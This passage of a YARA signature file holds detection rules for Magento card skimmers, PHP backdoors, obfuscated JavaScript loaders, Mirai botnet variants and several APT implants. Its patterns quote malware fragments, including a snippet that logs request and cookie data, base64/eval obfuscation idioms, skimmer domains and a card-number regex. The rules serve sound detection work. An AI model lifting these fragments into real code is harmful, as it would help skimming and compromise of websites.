    $ = "killall -9 \".basename(\"/usr/bin/host"
  condition:
    any of them
}

rule fake_magentoupdate_site {
  strings:
    $ = "magentopatchupdate.com"
  condition:
    any of them
}

rule md5_b3ee7ea209d2ff0d920dfb870bad8ce5 {
  strings:
    $ = /\$mysql_key\s*=\s*@?base64_decode/
    $ = /eval\(\s*\$mysql_key\s*\)/
  condition:
    all of them
}

rule md5_e03b5df1fa070675da8b6340ff4a67c2 {
  strings:
    $ = /if\(preg_match\("\/onepage\|admin\/",\s*\$_SERVER\['REQUEST_URI'\]\)\)\{\s*@?file_put_contents/
    $ = /@?base64_encode\(serialize\(\$_REQUEST\)\."--"\.serialize\(\$_COOKIE\)\)\."\\n",\s*FILE_APPEND\)/
  condition:
    any of them
}

rule md5_023a80d10d10d911989e115b477e42b5 {
  strings:
    $ = /chr\(\d{,3}\)\.\"\"\.chr\(\d{,3}\)/
  condition:
    any of them
}

rule md5_4aa900ddd4f1848a15c61a9b7acd5035 {
  strings:
    $ = "'base'.(128/2).'_de'.'code'"
  condition:
    any of them
}

rule md5_f797dd5d8e13fe5c8898dbe3beb3cc5b {
  strings:
    $ = "echo(\"FILE_Bad\");"
  condition:
    any of them
}

rule onepage_or_checkout {
  strings:
    $ = "\\x6F\\x6E\\x65\\x70\\x61\\x67\\x65\\x7C\\x63\\x68\\x65\\x63\\x6B\\x6F\\x75\\x74"
  condition:
    any of them
}

rule sinlesspleasure_com {
  strings:
    $ = "5e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92"
  condition:
    any of them
}

rule amasty_biz {
  strings:
    $ = "118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117"
  condition:
    any of them
}

rule amasty_biz_js {
  strings:
    $ = "t_p#0.qlb#0.#1Blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0"
  condition:
    any of them
}

rule returntosender {
  strings:
    $ = "\\x2F\\x6D\\x65\\x64\\x69\\x61\\x2F\\x63\\x61\\x74\\x61\\x6C\\x6F\\x67\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x2F\\x63\\x61\\x63\\x68\\x65\\x2F\\x31\\x2F\\x74\\x68\\x75\\x6D\\x62\\x6E\\x61\\x69\\x6C\\x2F\\x37\\x30\\x30\\x78\\x2F\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2F\\x42\\x2F\\x57\\x2F\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2E\\x70\\x68\\x70"
  condition:
    any of them
}

rule ip_5uu8_com {
  strings:
    $ = "\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d"
  condition:
    any of them
}

rule cloudfusion_me {
  strings:
    $ = "&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;"
  condition:
    any of them
}

rule grelos_v {
  strings:
    $ = "var grelos_v"
  condition:
    any of them
}

rule hacked_domains {
  strings:
    $ = "infopromo.biz"
    $ = "jquery-code.su"
    $ = "jquery-css.su"
    $ = "megalith-games.com"
    $ = "cdn-cloud.pw"
    $ = "animalzz921.pw"
    $ = "statsdot.eu"
  condition:
    any of them
}

rule mage_cdn_link {
  strings:
    $ = "\\x6D\\x61\\x67\\x65\\x2D\\x63\\x64\\x6E\\x2E\\x6C\\x69\\x6E\\x6B"
  condition:
    any of them
}

rule credit_card_regex {
  strings:
    $ = "RegExp(\"[0-9]{13,16}\")"
  condition:
    any of them
}

rule jquery_code_su {
  strings:
    $ = "105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101"
  condition:
    any of them
}

rule jquery_code_su_multi {
  strings:
    $ = "=oQKpkyJ8dCK0lGbwNnLn42bpRXYj9GbENDft12bkBjM8V2Ypx2c8Rnbl52bw12bDlkUVVGZvNWZkZ0M85WavpGfsJXd8R1UPB1NywXZtFmb0N3box"
  condition:
    any of them
}

rule Trafficanalyzer_js {
  strings:
    $ = "z=x['length'];for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)-10) }w=this['unescape'](y);this['eval'](w);"
  condition:
    any of them
}

rule atob_js {
  strings:
    $ = "this['eval'](this['atob']('"
  condition:
    any of them
}

rule gate_php_js {
  strings:
    $ = /\/gate.php\?token=.{,10}&host=/
  condition:
    any of them
}

rule googieplay_js {
  strings:
    $ = "tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?"
  condition:
    any of them
}

rule mag_php_js {
  strings:
    $ = "onepage|checkout|onestep|firecheckout|onestepcheckout"
    $ = "'one|check'"
  condition:
    any of them
}

rule thetech_org_js {
  strings:
    $ = "|RegExp|onepage|checkout|"
  condition:
    any of them
}

rule md5_cdn_js_link_js {
  strings:
    $ = "grelos_v= null"
  condition:
    any of them
}

rule fromCharCode_in_unicode {
  strings:
    $ = "\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065"
  condition:
    any of them and filesize < 512000
}

rule function_through_object {
  strings:
    $ = "['eval']"
    $ = "['unescape']"
    $ = "['charCodeAt']"
    $ = "['fromCharCode']"
  condition:
    any of them and filesize < 512000
}

rule hex_script {
  strings:
    $ = "\\x73\\x63\\x72\\x69\\x70\\x74\\x22"
  condition:
    any of them and filesize < 512000
}

rule php_malfunctions {
  strings:
    $ = "eval("
    $ = "gzinflate("
    $ = "str_rot13("
    $ = "base64_decode("
  condition:
    3 of them and filesize < 512000
}

rule php_obf_malfunctions {
  strings:
    $ = "eval(base64_decode"
    $ = "eval(gzinflate"
    $ = "str_rot13(base64_decode"
  condition:
    any of them and filesize < 512000
}

rule fopo_obfuscator {
  strings:
    $ = "www.fopo.com.ar"
  condition:
    any of them and filesize < 512000
}

rule obf_base64_decode {
  strings:
    $ = "\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145"
  condition:
    any of them and filesize < 512000
}

rule html_upload {
  strings:
    $ = "<input type='submit' name='upload' value='upload'>"
    $ = "if($_POST['upload'])"
  condition:
    any of them and filesize < 512000
}

rule php_uname {
  strings:
    $ = "php_uname()"
  condition:
    any of them and filesize < 512000
}

rule scriptkiddies {
  strings:
    $ = "lastc0de@Outlook.com" nocase
    $ = "CodersLeet" nocase
    $ = "AgencyCaFc" nocase
    $ = "IndoXploit" nocase
    $ = "Kapaljetz666" nocase
  condition:
    any of them and filesize < 512000
}

rule eval_with_comments {
  strings:
    $ = /(^|\s)eval\s*\/\*.{,128}\*\/\s*\(/
  condition:
    any of them and filesize < 512000
}

rule PM_Email_Sent_By_PHP_Script {
  strings:
    $php1 = "X-PHP-Script" fullword
    $php2 = "X-PHP-Originating-Script" fullword
    $php3 = "/usr/bin/php" fullword
  condition:
    any of them
}

rule PM_Zip_with_js {
  strings:
    $hdr = "PK"
    $e1 = ".js" nocase
    $e2 = ".jse" nocase
  condition:
    $hdr at 0 and (($e1 in (filesize - 100..filesize)) or ($e2 in (filesize - 100..filesize)))
}

rule MedussaHTTP_2019 {
  meta:
    author = "J from THL <j@techhelplist.com>"
    date = "2019-08-12"
    reference1 = "https://app.any.run/tasks/68c8f400-eba5-4d6c-b1f1-8b07d4c014a4/"
    reference2 = "https://www.netscout.com/blog/asert/medusahttp-ddos-slithers-back-spotlight"
    reference3 = "https://twitter.com/malware_traffic/status/1161034462983008261"
    version = 1
    maltype = "Bot"
    filetype = "memory"
    description = "MedussaHTTP v20190812"
  strings:
    $text01 = "|check|" ascii
    $text02 = "POST!" ascii
    $text03 = "httpactive" ascii
    $text04 = "httpstrong" ascii
    $text05 = "httppost" ascii
    $text06 = "slavicdragon" ascii
    $text07 = "slavicnodragon" ascii
    $text08 = "smartflood" ascii
    $text09 = "stop-all" ascii
    $text10 = "botkill" ascii
    $text11 = "updatehash" ascii
    $text12 = "xyz=" ascii
    $text13 = "abc=" ascii
  condition:
    9 of them
}

rule Trojan_W32_Gh0stMiancha_1_0_0 {
  meta:
    Author = "Context Threat Intelligence"
    Date = "2014/01/27"
    Description = "Bytes inside"
    Reference = "http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
  strings:
    $0x = { 57 5B 5A 5A 51 57 40 34 31 67 2E 31 70 34 5C 40 40 44 3B 25 3A 19 1E 5C 7B 67 60 2E 34 31 67 2E 31 70 19 1E 55 77 77 71 64 60 2E 34 3E 3B 3E 19 1E 57 7B 7A 60 71 7A 60 39 40 6D 64 71 2E 34 60 71 6C 60 3B 7C 60 79 78 19 1E 44 66 7B 6C 6D 39 57 7B 7A 7A 71 77 60 7D 7B 7A 2E 34 5F 71 71 64 39 55 78 7D 62 71 19 1E 57 7B 7A 60 71 7A 60 39 78 71 7A 73 60 7C 2E 34 24 19 1E 19 1E }
    $1 = { 5C E7 99 BD E5 8A A0 E9 BB 91 5C }
    $1x = { 48 F3 8D A9 F1 9E B4 FD AF 85 48 }
    $2 = "DllCanLoadNow"
    $2x = { 50 78 78 57 75 7A 58 7B 75 70 5A 7B 63 }
    $3x = { 5A 61 79 76 71 66 34 7B 72 34 67 61 76 7F 71 6D 67 2E 34 31 70 }
    $4 = "JXNcc2hlbGxcb3Blblxjb21tYW5k"
    $4x = { 5E 4C 5A 77 77 26 7C 78 76 53 6C 77 76 27 56 78 76 78 6C 7E 76 26 25 60 4D 43 21 7F }
    $5 = "SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA=="
    $5x = { 47 51 52 47 46 52 70 56 41 7F 42 77 46 51 42 40 45 25 5E 5E 41 52 46 5E 40 24 21 77 41 27 78 6E 70 53 42 60 4C 51 5A 78 76 7A 46 6D 4D 43 6C 45 77 79 2D 7E 4E 4C 5A 6E 76 27 5E 77 59 55 29 29 }
    $6 = "C:\\Users\\why\\"
    $6x = { 57 2E 48 41 67 71 66 67 48 63 7C 6D 48 }
    $7 = "g:\\ykcx\\"
    $7x = { 73 2E 48 6D 7F 77 6C 48 }
    $8 = "(miansha)"
    $8x = { 3C 79 7D 75 7A 67 7C 75 3D }
    $9 = "server(\xE5\xA3\xB3)"
    $9x = { 7C 2E 48 26 24 25 27 3A 25 25 3A 26 21 48 67 71 66 62 71 66 3C F1 B7 A7 3D 48 46 71 78 71 75 67 71 48 67 71 66 62 71 66 3A 64 70 76 }
    $cfgDecode = { 8A ?? ?? 80 C2 7A 80 F2 19 88 ?? ?? 41 3B CE 7C ?? }
  condition:
    any of them
}

rule MiniAsp3_mem : memory {
  meta:
    author = "chort (@chort0)"
    description = "Detect MiniASP3 in memory"
  strings:
    $pdb = "MiniAsp3\\Release\\MiniAsp.pdb" fullword
    $httpAbout = "http://%s/about.htm" fullword
    $httpResult = "http://%s/result_%s.htm" fullword
    $msgInetFail = "open internet failed…" fullword
    $msgRunErr = "run error!" fullword
    $msgRunOk = "run ok!" fullword
    $msgTimeOutM0 = "time out,change to mode 0" fullword
    $msgCmdNull = "command is null!" fullword
  condition:
    ($pdb and (all of ($http*)) and any of ($msg*))
}

rule Mirai_Generic_Arch : MALW {
  meta:
    description = "Mirai Botnet TR-069 Worm - Generic Architecture"
    author = "Felipe Molina / @felmoltor"
    date = "2016-12-04"
    version = "1.0"
    ref1 = "http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/"
    ref2 = "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759"
    ref3 = "https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/"
  strings:
    $miname = "Myname--is:"
    $iptables1 = "busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP"
    $iptables2 = "busybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP"
    $procnet = "/proc/net/tcp"
  condition:
    $miname and $iptables1 and $iptables2 and $procnet
}

rule Mirai_MIPS_LSB : MALW {
  meta:
    description = "Mirai Botnet TR-069 Worm - MIPS LSB"
    author = "Felipe Molina / @felmoltor"
    date = "2016-12-04"
    version = "1.0"
    MD5 = "bf650d39eb603d92973052ca80a4fdda"
    SHA1 = "03ecd3b49aa19589599c64e4e7a51206a592b4ef"
    ref1 = "http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/"
    ref2 = "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759"
    ref3 = "https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/"
  strings:
    $miname = "Myname--is:"
    $iptables1 = "busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP"
    $iptables2 = "busybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP"
    $procnet = "/proc/net/tcp"
  condition:
    $miname and $iptables1 and $iptables2 and $procnet and hash.sha1(0, filesize) == "03ecd3b49aa19589599c64e4e7a51206a592b4ef"
}

rule Mirai_MIPS_MSB : MALW {
  meta:
    description = "Mirai Botnet TR-069 Worm - MIPS MSB"
    author = "Felipe Molina / @felmoltor"
    date = "2016-12-04"
    version = "1.0"
    MD5 = "0eb51d584712485300ad8e8126773941"
    SHA1 = "18bce2f0107b5fab1b0b7c453e2a6b6505200cbd"
    ref1 = "http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/"
    ref2 = "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759"
    ref3 = "https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/"
  strings:
    $miname = "Myname--is:"
    $iptables1 = "busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP"
    $iptables2 = "busybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP"
    $procnet = "/proc/net/tcp"
  condition:
    $miname and $iptables1 and $iptables2 and $procnet and hash.sha1(0, filesize) == "18bce2f0107b5fab1b0b7c453e2a6b6505200cbd"
}

rule Mirai_ARM_LSB : MALW {
  meta:
    description = "Mirai Botnet TR-069 Worm - ARM LSB"
    author = "Felipe Molina / @felmoltor"
    date = "2016-12-04"
    version = "1.0"
    MD5 = "eba670256b816e2d11f107f629d08494"
    SHA1 = "8a25dee4ea7d61692b2b95bd047269543aaf0c81"
    ref1 = "http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/"
    ref2 = "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759"
    ref3 = "https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/"
  strings:
    $miname = "Myname--is:"
    $iptables1 = "busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP"
    $iptables2 = "busybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP"
    $procnet = "/proc/net/tcp"
  condition:
    $miname and $iptables1 and $iptables2 and $procnet and hash.sha1(0, filesize) == "8a25dee4ea7d61692b2b95bd047269543aaf0c81"
}

rule Mirai_Renesas_SH : MALW {
  meta:
    description = "Mirai Botnet TR-069 Worm - Renesas SH LSB"
    author = "Felipe Molina / @felmoltor"
    date = "2016-12-04"
    version = "1.0"
    MD5 = "863dcf82883c885b0686dce747dcf502"
    SHA1 = "bdc86295fad70480f0c6edcc37981e3cf11d838c"
    ref1 = "http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/"
    ref2 = "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759"
    ref3 = "https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/"
  strings:
    $miname = "Myname--is:"
    $iptables1 = "busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP"
    $iptables2 = "busybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP"
    $procnet = "/proc/net/tcp"
  condition:
    $miname and $iptables1 and $iptables2 and $procnet and hash.sha1(0, filesize) == "bdc86295fad70480f0c6edcc37981e3cf11d838c"
}

rule Mirai_PPC_Cisco : MALW {
  meta:
    description = "Mirai Botnet TR-069 Worm - PowerPC or Cisco 4500"
    author = "Felipe Molina / @felmoltor"
    date = "2016-12-04"
    version = "1.0"
    MD5 = "dbd92b08cbff8455ff76c453ff704dc6"
    SHA1 = "6933d555a008a07b859a55cddb704441915adf68"
    ref1 = "http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/"
    ref2 = "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759"
    ref3 = "https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/"
  strings:
    $miname = "Myname--is:"
    $iptables1 = "busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP"
    $iptables2 = "busybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP"
    $procnet = "/proc/net/tcp"
  condition:
    ($miname and $iptables1 and $iptables2 and $procnet) and hash.sha1(0, filesize) == "6933d555a008a07b859a55cddb704441915adf68"
}

rule Mirai_SPARC_MSB : MALW {
  meta:
    description = "Mirai Botnet TR-069 Worm - SPARC MSB"
    author = "Felipe Molina / @felmoltor"
    date = "2016-12-04"
    version = "1.0"
    MD5 = "05891dbabc42a36f33c30535f0931555"
    SHA1 = "3d770480b6410cba39e19b3a2ff3bec774cabe47"
    ref1 = "http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/"
    ref2 = "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759"
    ref3 = "https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/"
  strings:
    $miname = "Myname--is:"
    $iptables1 = "busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP"
    $iptables2 = "busybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP"
    $procnet = "/proc/net/tcp"
  condition:
    ($miname and $iptables1 and $iptables2 and $procnet) and hash.sha1(0, filesize) == "3d770480b6410cba39e19b3a2ff3bec774cabe47"
}

rule Mirai_1 : MALW {
  meta:
    description = "Mirai Variant 1"
    author = "Joan Soriano / @joanbtl"
    date = "2017-04-16"
    version = "1.0"
    MD5 = "655c3cf460489a7d032c37cd5b84a3a8"
    SHA1 = "4dd3803956bc31c8c7c504734bddec47a1b57d58"
  strings:
    $dir1 = "/dev/watchdog"
    $dir2 = "/dev/misc/watchdog"
    $pass1 = "PMMV"
    $pass2 = "FGDCWNV"
    $pass3 = "OMVJGP"
  condition:
    $dir1 and $pass1 and $pass2 and not $pass3 and not $dir2
}

rule Mirai_2 : MALW {
  meta:
    description = "Mirai Variant 2"
    author = "Joan Soriano / @joanbtl"
    date = "2017-04-16"
    version = "1.0"
    MD5 = "0e5bda9d39b03ce79ab8d421b90c0067"
    SHA1 = "96f42a9fad2923281d21eca7ecdd3161d2b61655"
  strings:
    $dir1 = "/dev/watchdog"
    $dir2 = "/dev/misc/watchdog"
    $s1 = "PMMV"
    $s2 = "ZOJFKRA"
    $s3 = "FGDCWNV"
    $s4 = "OMVJGP"
  condition:
    $dir1 and $dir2 and $s1 and $s2 and $s3 and not $s4
}

rule Mirai_3 : MALW {
  meta:
    description = "Mirai Variant 3"
    author = "Joan Soriano / @joanbtl"
    date = "2017-04-16"
    version = "1.0"
    MD5 = "bb22b1c921ad8fa358d985ff1e51a5b8"
    SHA1 = "432ef83c7692e304c621924bc961d95c4aea0c00"
  strings:
    $dir1 = "/dev/watchdog"
    $dir2 = "/dev/misc/watchdog"
    $s1 = "PMMV"
    $s2 = "ZOJFKRA"
    $s3 = "FGDCWNV"
    $s4 = "OMVJGP"
    $ssl = "ssl3_ctrl"
  condition:
    $dir1 and $dir2 and $s1 and $s2 and $s3 and $s4 and not $ssl
}

rule Mirai_4 : MALW {
  meta:
    description = "Mirai Variant 4"
    author = "Joan Soriano / @joanbtl"
    date = "2017-04-16"
    version = "1.0"
    MD5 = "f832ef7a4fcd252463adddfa14db43fb"
    SHA1 = "4455d237aadaf28aafce57097144beac92e55110"
  strings:
    $s1 = "210765"
    $s2 = "qllw"
    $s3 = ";;;;;;"
  condition:
    $s1 and $s2 and $s3
}

rule Mirai_Dwnl : MALW {
  meta:
    description = "Mirai Downloader"
    author = "Joan Soriano / @joanbtl"
    date = "2017-04-16"
    version = "1.0"
    MD5 = "85784b54dee0b7c16c57e3a3a01db7e6"
    SHA1 = "6f6c625ef730beefbc23c7f362af329426607dee"
  strings:
    $s1 = "GET /mirai/"
    $s2 = "dvrHelper"
  condition:
    $s1 and $s2
}

rule Mirai_5 : MALW {
  meta:
    description = "Mirai Variant 5"
    author = "Joan Soriano / @joanbtl"
    date = "2017-04-16"
    version = "1.0"
    MD5 = "7e17c34cddcaeb6755c457b99a8dfe32"
    SHA1 = "b63271672d6a044704836d542d92b98e2316ad24"
  strings:
    $dir1 = "/dev/watchdog"
    $dir2 = "/dev/misc/watchdog"
    $s1 = "PMMV"
    $s2 = "ZOJFKRA"
    $s3 = "FGDCWNV"
    $s4 = "OMVJGP"
    $ssl = "ssl3_ctrl"
  condition:
    $dir1 and $dir2 and $s1 and $s2 and $s3 and $s4 and $ssl
}

rule Mirai_Okiru {
  meta:
    description = "Detects Mirai Okiru MALW"
    reference = "https://www.reddit.com/r/LinuxMalware/comments/7p00i3/quick_notes_for_okiru_satori_variant_of_mirai/"
    date = "2018-01-05"
  strings:
    $hexsts01 = { 68 7F 27 70 60 62 73 3C 27 28 65 6E 69 28 65 72 }
    $hexsts02 = { 74 7E 65 68 7F 27 73 61 73 77 3C 27 28 65 6E 69 }
  condition:
    all of them and is__elf and is__Mirai_gen7 and filesize < 102400
}

private rule is__Mirai_Satori_gen {
  meta:
    description = "Detects Mirai Satori_gen"
    reference = "https://www.reddit.com/r/LinuxMalware/comments/7p00i3/quick_notes_for_okiru_satori_variant_of_mirai/"
    date = "2018-01-05"
  strings:
    $st08 = "tftp -r satori" ascii wide nocase fullword
    $st09 = "/bins/satori" ascii wide nocase fullword
    $st10 = "satori" ascii wide nocase fullword
    $st11 = "SATORI" ascii wide nocase fullword
  condition:
    2 of them
}

rule Mirai_Satori {
  meta:
    description = "Detects Mirai Satori MALW"
    date = "2018-01-09"
  strings:
    $hexsts01 = { 63 71 75 ?? 62 6B 77 62 75 }
    $hexsts02 = { 53 54 68 72 75 64 62 }
    $hexsts03 = { 28 63 62 71 28 70 66 73 64 6F 63 68 60 }
  condition:
    all of them and is__elf and is__Mirai_gen7 and is__Mirai_Satori_gen and filesize < 102400
}

rule tran_duy_linh {
  meta:
    author = "@patrickrolsen"
    maltype = "Misc."
    version = "0.2"
    reference = "8fa804105b1e514e1998e543cd2ca4ea, 872876cfc9c1535cd2a5977568716ae1, etc."
    date = "01/03/2014"
  strings:
    $doc = { D0 CF 11 E0 }
    $string1 = "Tran Duy Linh" fullword
    $string2 = "DLC Corporation" fullword
  condition:
    ($doc at 0) and (all of ($string*))
}

rule misc_iocs {
  meta:
    author = "@patrickrolsen"
    maltype = "Misc."
    version = "0.1"
    reference = "N/A"
  strings:
    $doc = { D0 CF 11 E0 }
    $s1 = "dw20.exe"
    $s2 = "cmd /"
  condition:
    ($doc at 0) and (1 of ($s*))
}

rule malicious_LNK_files {
  meta:
    author = "@patrickrolsen"
  strings:
    $magic = { 4C 00 00 00 01 14 02 00 }
    $s1 = "\\RECYCLER\\" wide
    $s2 = "%temp%" wide
    $s3 = "%systemroot%\\system32\\cmd.exe" wide
    $s5 = "svchost.exe" wide
    $s6 = "lsass.exe" wide
    $s7 = "csrss.exe" wide
    $s8 = "winlogon.exe" wide
    $s10 = "%appdata%" wide
    $s11 = "%programdata%" wide
    $s12 = "%localappdata%" wide
    $s13 = ".cpl" wide
  condition:
    ($magic at 0) and any of ($s*)
}

rule memory_pivy {
  meta:
    author = "https://github.com/jackcr/"
  strings:
    $a = { 00 00 00 00 00 00 00 00 00 00 00 53 74 75 62 50 61 74 68 00 }
  condition:
    any of them
}

rule memory_shylock {
  meta:
    author = "https://github.com/jackcr/"
  strings:
    $a = /pipe\\[A-F0-9]{32}/
    $b = /id=[A-F0-9]{32}/
    $c = /MASTER_[A-F0-9]{32}/
    $d = "***Load injects by PIPE (%s)"
    $e = "***Load injects url=%s (%s)"
    $f = "*********************** Ping Ok ************************"
    $g = "*** LOG INJECTS *** %s"
  condition:
    any of them
}

rule ScanBox_Malware_Generic {
  meta:
    description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
    author = "Florian Roth"
    reference1 = "http://goo.gl/MUUfjv"
    reference2 = "http://goo.gl/WXUQcP"
    date = "2015/02/28"
    hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
    hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
    hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
  strings:
    $s0 = "http://142.91.76.134/p.dat" ascii fullword
    $s1 = "HttpDump 1.1" ascii fullword
    $s3 = "SecureInput .exe" wide fullword
    $s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" ascii fullword
    $s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" ascii fullword
    $s6 = "ServiceMaix" ascii fullword
    $x1 = "Management Support Team1" ascii fullword
    $x2 = "DTOPTOOLZ Co.,Ltd.0" ascii fullword
    $x3 = "SEOUL1" ascii fullword
  condition:
    (1 of ($s*) and 2 of ($x*)) or (3 of ($x*))
}

rule TrojanDownloader {
  meta:
    description = "Trojan Downloader - Flash Exploit Feb15"
    author = "Florian Roth"
    reference = "http://goo.gl/wJ8V1I"
    date = "2015/02/11"
    hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
    score = 60
  strings:
    $x1 = "Hello World!" ascii fullword
    $x2 = "CONIN$" ascii fullword
    $s6 = "GetCommandLineA" ascii fullword
    $s7 = "ExitProcess" ascii fullword
    $s8 = "CreateFileA" ascii fullword
    $s5 = "SetConsoleMode" ascii fullword
    $s9 = "TerminateProcess" ascii fullword
    $s10 = "GetCurrentProcess" ascii fullword
    $s11 = "UnhandledExceptionFilter" ascii fullword
    $s3 = "user32.dll" ascii fullword
    $s16 = "GetEnvironmentStrings" ascii fullword
    $s2 = "GetLastActivePopup" ascii fullword
    $s17 = "GetFileType" ascii fullword
    $s19 = "HeapCreate" ascii fullword
    $s20 = "VirtualFree" ascii fullword
    $s21 = "WriteFile" ascii fullword
    $s22 = "GetOEMCP" ascii fullword
    $s23 = "VirtualAlloc" ascii fullword
    $s24 = "GetProcAddress" ascii fullword
    $s26 = "FlushFileBuffers" ascii fullword
    $s27 = "SetStdHandle" ascii fullword
    $s28 = "KERNEL32.dll" ascii fullword
  condition:
    $x1 and $x2 and (all of ($s*)) and filesize < 35000
}

rule Cloaked_as_JPG {
  meta:
    description = "Detects a cloaked file as JPG"
    author = "Florian Roth (eval section from Didier Stevens)"
    date = "2015/02/29"
    score = 70
  strings:
    $ext = "extension: .jpg"
  condition:
    $ext and uint16be(0) != 65496
}

rule rtf_yahoo_ken {
  meta:
    author = "@patrickrolsen"
    maltype = "Yahoo Ken"
    filetype = "RTF"
    version = "0.1"
    description = "Test rule"
    date = "2013-12-14"
  strings:
    $magic1 = { 7B 5C 72 74 30 31 }
    $magic2 = { 7B 5C 72 74 66 31 }
    $magic3 = { 7B 5C 72 74 78 61 33 }
    $author1 = { 79 61 68 6F 6F 20 6B 65 63 }
  condition:
    ($magic1 or $magic2 or $magic3 at 0) and $author1
}

rule ZXProxy {
  meta:
    author = "ThreatConnect Intelligence Research Team"
  strings:
    $C = "\\Control\\zxplug" ascii wide nocase
    $h = "http://www.facebook.com/comment/update.exe" ascii wide
    $S = "Shared a shell to %s:%s Successfully" ascii wide nocase
  condition:
    any of them
}

rule OrcaRAT {
  meta:
    Author = "PwC Cyber Threat Operations"
    Date = "2014/10/20"
    Description = "Strings inside"
    Reference = "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html"
  strings:
    $MZ = "MZ"
    $apptype1 = "application/x-ms-application"
    $apptype2 = "application/x-ms-xbap"
    $apptype3 = "application/vnd.ms-xpsdocument"
    $apptype4 = "application/xaml+xml"
    $apptype5 = "application/x-shockwave-flash"
    $apptype6 = "image/pjpeg"
    $err1 = "Set return time error =   %d!"
    $err2 = "Set return time   success!"
    $err3 = "Quit success!"
  condition:
    $MZ at 0 and filesize < 512000 and (all of ($apptype*) and 1 of ($err*))
}

rule EmiratesStatement {
  meta:
    Author = "Christiaan Beek"
    Date = "2013-06-30"
    Description = "Credentials Stealing Attack"
    Reference = "https://blogs.mcafee.com/mcafee-labs/targeted-campaign-steals-credentials-in-gulf-states-and-caribbean"
    hash0 = "0e37b6efe5de1cc9236017e003b1fc37"
    hash1 = "a28b22acf2358e6aced43a6260af9170"
    hash2 = "6f506d7adfcc2288631ed2da37b0db04"
    hash3 = "8aebade47dc1aa9ac4b5625acf5ade8f"
  strings:
    $string0 = "msn.klm"
    $string1 = "wmsn.klm"
    $string2 = "bms.klm"
  condition:
    all of them
}
